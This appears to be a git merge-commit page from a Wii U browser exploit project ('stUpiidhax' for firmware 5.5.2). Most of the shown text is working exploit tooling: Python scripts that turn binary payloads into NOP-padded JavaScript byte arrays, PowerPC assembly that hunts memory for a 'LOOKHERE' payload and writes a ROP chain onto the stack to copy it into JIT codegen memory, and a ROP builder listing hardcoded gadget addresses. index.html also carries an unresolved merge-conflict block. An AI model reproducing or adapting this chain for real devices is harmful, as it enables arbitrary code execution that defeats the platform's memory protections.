Browse Source

Merge branch 'master' of github:jumpcallpop/wiiutest into upsteam-master

 Conflicts:
	index.html (kept ours)
	payload/exploit-old.html (used theirs)
pull/3/head
c? 2 years ago
parent
commit
80ab0b3aca

BIN
a.out View File


+ 22
- 23
codebin2js.py View File

@@ -1,47 +1,46 @@
import struct
import os

j = 0;

"""
for i in range(0x2000):
print "0x90, ",
if i%32 == 31:
print ""
"""
print "["
j = 0;

payload = ""
try:
f = open("wiiuhaxx_loader.bin", "rb")
while True:
B = struct.unpack(">B", f.read(1))[0];
print "0x%02x," % (B),
payload += "0x%02x, " % (B)
j+=1
except:
print ""
payload += "\n"

for i in range(j&0x03):
print "0x00, "
print ""
payload += "0x00, "
payload += "\n"

#print "0x48, 0x00, 0x00, 0x05, 0x7c, 0x68, 0x02, 0xa6, 0x38, 0x80, 0x00, 0x48, 0x7c, 0x84, 0x1a, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x7f, 0xa3, 0xeb, 0x78, 0x38, 0xc0, 0x00, 0x02, 0x7c, 0xa5, 0x34, 0x30, 0x7c, 0xa9, 0x03, 0xa6, 0x80, 0xa4, 0x00, 0x00, 0x90, 0xa3, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x38, 0x63, 0x00, 0x04, 0x42, 0x00, 0xff, 0xf0, 0x7c, 0x21, 0xf2, 0x14, 0x80, 0x61, 0x00, 0x04, 0x7c, 0x69, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x20,"
print "0x00, 0x40, 0x00, 0x00,"
payload += "0x00, 0x40, 0x00, 0x00,\n"
j+=4
try:
f = open("code550.bin", "rb")
while True:
B = struct.unpack(">B", f.read(1))[0];
print "0x%02x," % (B),
payload += "0x%02x, " % (B)
j+=1
except:
print ""
payload += ""
for i in range(j&0x03):
print "0x00,",
print ""
payload += "0x00,"
payload += "\n"

#nop
nop = "";
for i in range(j, 0x4000-4, 4):
nop += "0x60, 0x00, 0x00, 0x00, "
nop += "\n"

#padding
for i in range(j, 0x4000-4):
print "0x90,",
print ""
print "["
print nop
print payload
print "]"

+ 43
- 0
codebin2js_DEV.py View File

@@ -0,0 +1,43 @@
import struct

j = 0;

payload = "[\n"
"""
try:
f = open("wiiuhaxx_loader.bin", "rb")
while True:
B = struct.unpack(">B", f.read(1))[0];
payload += "0x%02x, " % (B)
j+=1
except:
payload += "\n"

for i in range(j&0x03):
payload += "0x00, "
payload += "\n"

#print "0x48, 0x00, 0x00, 0x05, 0x7c, 0x68, 0x02, 0xa6, 0x38, 0x80, 0x00, 0x48, 0x7c, 0x84, 0x1a, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x7f, 0xa3, 0xeb, 0x78, 0x38, 0xc0, 0x00, 0x02, 0x7c, 0xa5, 0x34, 0x30, 0x7c, 0xa9, 0x03, 0xa6, 0x80, 0xa4, 0x00, 0x00, 0x90, 0xa3, 0x00, 0x00, 0x38, 0x84, 0x00, 0x04, 0x38, 0x63, 0x00, 0x04, 0x42, 0x00, 0xff, 0xf0, 0x7c, 0x21, 0xf2, 0x14, 0x80, 0x61, 0x00, 0x04, 0x7c, 0x69, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x20,"
payload += "0x00, 0x10, 0x00, 0x00,\n"
j+=4
"""
try:
f = open("codeloader.bin", "rb")
while True:
B = struct.unpack(">B", f.read(1))[0];
payload += "0x%02x, " % (B)
j+=1
except:
payload += ""
for i in range(j&0x03):
payload += "0x00,"
payload += "\n"

#padding
for i in range(j, 0x1000-4, 4):
payload += "0x60, 0x00, 0x00, 0x00, "
payload += "\n"
payload += "]"

print payload

+ 8
- 0
index.html View File

@@ -5,6 +5,7 @@ body{background:#222;color:#fff;}
a{color:009ac7;}
</style>
<div class="align">
<<<<<<< HEAD
<h2>stUpiidhax: Wii U 5.5.2 browser pwn</h2>
<a href="payload/exploit.html"><h1>Exploit</h1></a>
<h2>
@@ -24,4 +25,11 @@ Try the big exploit button a few times first. Clearing your browser save data or
This service provided by <a href="https://twitter.com/ColtonDRG">ColtonDRG</a>. <a href="https://github.com/coltondrg/stupiidhax">Source for this site</a>.<br/>
All the real work was done by the <a href="https://gbatemp.net/threads/webhack-on-5-5-2.480938/">the smart people on this thread's OP</a><br/>
git commit <!--#include file="commit.html" -->
=======
<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
<a href="payload/exploit_WORKING.html"><h1>Exploit WORKING</h1></a><br/>
<a href="payload/exploit.html"><h1>Exploit DEV</h1></a><br/>
>>>>>>> 77dd2dbe58d4f174656bbac43350417947b294be
</div>

+ 4
- 0
miniloader/build_codeloader.bat View File

@@ -0,0 +1,4 @@
#Assemble the codeloader and extract the code section to codeloader.bin
powerpc-eabi-as -mregnames codeloader.s -o codeloader.o
powerpc-eabi-ld -Ttext 0x80000000 codeloader.o
powerpc-eabi-objcopy -O binary codeloader.o codeloader.bin

BIN
miniloader/codeloader.bin View File


BIN
miniloader/codeloader.o View File


+ 196
- 0
miniloader/codeloader.s View File

@@ -0,0 +1,196 @@
# This is a program written in PPC to search address range 1C000000-1D000000
# for the magic "LOOKHERE", then load the code based on the format

#Format to load:
# struct PAYLOAD{
# char magic[8]; // "LOOKHERE"
# uint32 size; // Size of code
# byte code[size]; // Raw PPC to load
# }

#Set up register aliases to make the code more readable
.set r0, 0
.set r1, 1
.set r2, 2
.set r3, 3
.set r4, 4
.set r5, 5
.set r6, 6
.set r7, 7
.set r8, 8
.set r9, 9
.set r10, 10
.set r11, 11
.set r12, 12
.set r13, 13
.set r14, 14
.set r15, 15
.set r16, 16
.set r17, 17
.set r18, 18
.set r19, 19
.set r20, 20
.set r21, 21
.set r22, 22
.set r23, 23
.set r24, 24
.set r25, 25
.set r26, 26
.set r27, 27
.set r28, 28
.set r29, 29
.set r30, 30
.set r31, 31

#load address range to search
lis r7, 0x1B00 #r7 = 1C000000
lis r8, 0x1D00 #r8 = 1D000000

#Load "LOOK" in r9
lis r9, 0x4C4F
ori r9, r9, 0x4F4B

#Load "HERE" in r10
lis r10, 0x4845
ori r10, r10, 0x5245

loop_start:
#Check if the first word at r7 is equal to "LOOK" (r9)
lwz r11, 0(r7)
cmpw r11, r9
bne not_equal #If not, restart loop

#Check if second word at r7 is equal to "HERE" (r10)
lwz r11, 4(r7)
cmpw r11, r10
beq found #If so, exit the loop and load the code

#If "LOOKHERE" is not located at r7
not_equal:
#Increment by one word
addi r7, r7, 4
cmpw r7, r8 #Check if the counter (r7) is out of search range
bge not_found #If out of range, exit loop and kill program
b loop_start #If still in range, restart loop


found:
#Setup r11 as payloadSize and r7 as payloadAddress
lwz r11, 8(r7)
addi r7, r7, 0xC

#Set up ROP chain to copy our code to codegen (we can't be executing from JIT while copying to JIT)
#See ropChainToAsm.py for in-order ROP chain
li r10, 0x0000
stw r10, 0x0(r1)
stw r10, 0x8(r1)
stw r10, 0xC(r1)
stw r10, 0x10(r1)
stw r10, 0x14(r1)
stw r10, 0x18(r1)
stw r10, 0x24(r1)
stw r10, 0x28(r1)
stw r10, 0x2C(r1)
stw r10, 0x30(r1)
stw r10, 0x38(r1)
stw r10, 0x3C(r1)
stw r10, 0x40(r1)
stw r10, 0x44(r1)
stw r10, 0x48(r1)
stw r10, 0x50(r1)
stw r10, 0x54(r1)
stw r10, 0x58(r1)
stw r10, 0x60(r1)
stw r10, 0x70(r1)
stw r10, 0x78(r1)
stw r10, 0x80(r1)
stw r10, 0x84(r1)
stw r10, 0x88(r1)
stw r10, 0x8C(r1)
stw r10, 0x90(r1)
stw r10, 0x98(r1)
stw r10, 0x9C(r1)
stw r10, 0xA0(r1)
stw r10, 0xA4(r1)
stw r10, 0xA8(r1)
stw r10, 0xB8(r1)
stw r10, 0xBC(r1)
stw r10, 0xC0(r1)
stw r10, 0xC8(r1)
stw r10, 0xCC(r1)
stw r10, 0xD0(r1)
stw r10, 0xD4(r1)
stw r10, 0xD8(r1)
stw r10, 0xE0(r1)
stw r10, 0xE4(r1)
stw r10, 0xE8(r1)
stw r10, 0xEC(r1)
stw r10, 0xF0(r1)
stw r10, 0x100(r1)
stw r10, 0x108(r1)
stw r10, 0x110(r1)
stw r10, 0x114(r1)
stw r10, 0x118(r1)
stw r10, 0x11C(r1)
stw r10, 0x120(r1)
stw r10, 0x128(r1)
stw r10, 0x12C(r1)
stw r10, 0x130(r1)
stw r10, 0x134(r1)
stw r10, 0x138(r1)
stw r10, 0x148(r1)
stw r10, 0x150(r1)
stw r10, 0x158(r1)
li r10, 0x0001
stw r10, 0xB4(r1)
lis r10, 0x0102
ori r10, r10, 0x04C8
stw r10, 0x4(r1)
stw r10, 0x4C(r1)
stw r10, 0x94(r1)
stw r10, 0xDC(r1)
stw r10, 0x124(r1)
lis r10, 0x0102
ori r10, r10, 0x3F88
stw r10, 0xF8(r1)
lis r10, 0x0102
ori r10, r10, 0x40B0
stw r10, 0x140(r1)
lis r10, 0x0103
ori r10, r10, 0x5FC8
stw r10, 0x68(r1)
lis r10, 0x0103
ori r10, r10, 0x76C0
stw r10, 0x20(r1)
stw r10, 0xB0(r1)
lis r10, 0x0107
ori r10, r10, 0xDD70
stw r10, 0x1C(r1)
stw r10, 0x64(r1)
stw r10, 0xAC(r1)
stw r10, 0xF4(r1)
stw r10, 0x13C(r1)
lis r10, 0x0108
ori r10, r10, 0x0274
stw r10, 0x34(r1)
stw r10, 0x7C(r1)
stw r10, 0xC4(r1)
stw r10, 0x10C(r1)
stw r10, 0x154(r1)
lis r10, 0x0180
stw r10, 0x6C(r1)
stw r10, 0xFC(r1)
stw r10, 0x144(r1)
stw r10, 0x15C(r1)
stw r7, 0x74(r1)
stw r11, 0x5C(r1)
stw r11, 0x104(r1)
stw r11, 0x14C(r1)

#Start ROP
lwz r0, 0x4(r1)
mtlr r0
blr

not_found:
blr #RIP, no payload found

+ 40
- 0
miniloader/ropChainToAsm.py View File

@@ -0,0 +1,40 @@
# Assemble rop chain into semi-optimized ppc to write over the stack
# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
# FFFF2222 is a stand in for the payload load address (stored in r7)
# FFFF3333 is a stand in for the payload size (stored in r11)
# place at "found:" in codeloader.s


#This ROP chain was created using:
# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
writeRegister = ''
for address in ropChainAddresses:
if address == 'FFFF2222':
writeRegister = 'r7'
elif address == 'FFFF3333':
writeRegister = 'r11'
elif address[:4] == '0000':
print('li r10, 0x'+address[4:])
writeRegister = 'r10'
else:
print('lis r10, 0x'+address[:4])
if address[4:] != "0000":
print('ori r10, r10, 0x'+address[4:])

last = ropChain.index(address)
while last != -1:
print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
try:
last = ropChain.index(address, last+1)
except ValueError:
last = -1

+ 131
- 0
miniloader/ropchainBuilder.html View File

@@ -0,0 +1,131 @@
<!--
This is just something for me to use a console on chrome to form ROP chains
-->
<script>
//Rop offset
{
ROP_POPJUMPLR_STACK12 = 0x0101cd24;
ROP_POPJUMPLR_STACK20 = 0x01024d88;
ROP_CALLFUNC = 0x01080274;
ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
ROP_POP_R28R29R30R31 = 0x0101d8d4;
ROP_POP_R27 = 0x0101cb00;
ROP_POP_R24_TO_R31 = 0x010204c8;
ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
ROP_SETR3TOR31_POP_R31 = 0x0101cc10;

ROP_memcpy = 0x01035fc8;
ROP_DCFlushRange = 0x01023f88;
ROP_ICInvalidateRange = 0x010240b0;
ROP_OSSwitchSecCodeGenMode = 0x010376c0;
ROP_OSCodegenCopy = 0x010376d8;
ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
ROP_OSGetCoreId = 0x01024e8c;
ROP_OSGetCurrentThread = 0x01043150;
ROP_OSSetThreadAffinity = 0x010429dc;
ROP_OSYieldThread = 0x010418e4;
ROP_OSFatal = 0x01031618;
ROP_Exit = 0x0101cd80;
ROP_OSScreenFlipBuffersEx = 0x0103afd0;
ROP_OSScreenClearBufferEx = 0x0103b090;
ROP_OSDynLoad_Acquire = 0x0102a3b4;
ROP_OSDynLoad_FindExport = 0x0102b828;
ROP_os_snprintf = 0x0102f160;
}

//Rop helper
{
var ab = new ArrayBuffer(0x10000);
var ropCurrentDv = new DataView(ab)
var ropChain = new Uint32Array(ab);
var ropCurrentOffset = 0;

function ropchain_appendu32(val)
{
ropCurrentDv.setUint32(ropCurrentOffset, val);
ropCurrentOffset += 4;
}

function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
{
ropchain_appendu32(ROP_POP_R24_TO_R31);
ropchain_appendu32(0x0);
ropchain_appendu32(0x0);

ropchain_appendu32(r24);
ropchain_appendu32(r25);
ropchain_appendu32(r26);
ropchain_appendu32(r27);
ropchain_appendu32(r28);
ropchain_appendu32(r29);
ropchain_appendu32(r30);
ropchain_appendu32(r31);

ropchain_appendu32(0x0);
}

function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
{
ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);

ropchain_appendu32(ROP_CALLFUNC);

ropchain_appendu32(r28);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
}

function ropgen_switchto_core1()
{
ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.

ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);

ropchain_appendu32(ROP_OSYieldThread);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);

ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);

ropchain_appendu32(0x0);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
}

function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
{
ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
}

function ropgen_memcpy(dst, src, size)
{
ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
}

function ropgen_DCFlushRange(addr, size)
{
ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
}

function ropgen_ICInvalidateRange(addr, size)
{
ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
}

function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
{
ropgen_OSSwitchSecCodeGenMode(0);
ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
ropgen_OSSwitchSecCodeGenMode(1);

ropgen_DCFlushRange(codegen_addr, codebin_size);
ropgen_ICInvalidateRange(codegen_addr, codebin_size);
}
}
</script>

+ 3
- 2
payload.js
File diff suppressed because it is too large
View File


BIN
payload/boot.elf View File


BIN
payload/boot_.elf View File


+ 59
- 48
payload/exploit-old.html
File diff suppressed because it is too large
View File


+ 244
- 0
payload/exploit_WORKING.html
File diff suppressed because it is too large
View File


+ 43
- 0
ropChainToAsm.py View File

@@ -0,0 +1,43 @@
# Assemble rop chain into semi-optimized ppc to write over the stack
# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
# FFFF2222 is a stand in for the payload load address (stored in r7)
# FFFF3333 is a stand in for the payload size (stored in r11)
# place at "found:" in codeloader.s


#This ROP chain was created using:
# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
writeRegister = ''
for address in ropChainAddresses:
if address == 'FFFF2222':
writeRegister = 'r7'
elif address == 'FFFF3333':
writeRegister = 'r11'
elif address[:4] == '0000':
print('li r10, 0x'+address[4:])
writeRegister = 'r10'
else:
print('lis r10, 0x'+address[:4])
if address[4:] != "0000":
print('ori r10, r10, 0x'+address[4:])

last = ropChain.index(address)
while last != -1:
print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
try:
last = ropChain.index(address, last+1)
except ValueError:
last = -1

Loading…
Cancel
Save